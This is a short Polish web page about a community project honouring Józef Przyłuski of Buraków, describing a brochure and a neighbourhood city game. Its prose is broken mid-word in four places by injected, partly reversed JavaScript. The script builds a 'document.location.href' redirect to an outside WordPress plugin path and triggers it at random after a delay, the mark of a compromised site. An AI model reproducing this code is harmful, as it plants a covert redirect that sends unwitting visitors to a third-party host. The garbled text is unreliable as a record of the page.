Przyłuski

Podczas realizacji projektu „Architekci naszej rzeczywistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości” – Józef Przyłuski, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrodziej Burakowa wykonano dwa zasadnicze działania:

  1. Wydano broszurę Buraków-Wrzosów i jego założyciel

  2. Przeprowadzono Grę miejską na terenie osiedla Buraków
    Gra miejska polegała na udzieleniu prawidłowych odpowiedzi na pytania ukryte w różnych miejscach Burakowa. Każdy z uczestników otrzymywał mapę, na której były zaznaczone miejsca ukrycia pytań. Uczestnicy mogli ztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobyć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowe pytania (i udzielić na nie odpowiedzi) od różnych osób przebranych w stylu epoki Józefa Przyłuskiego.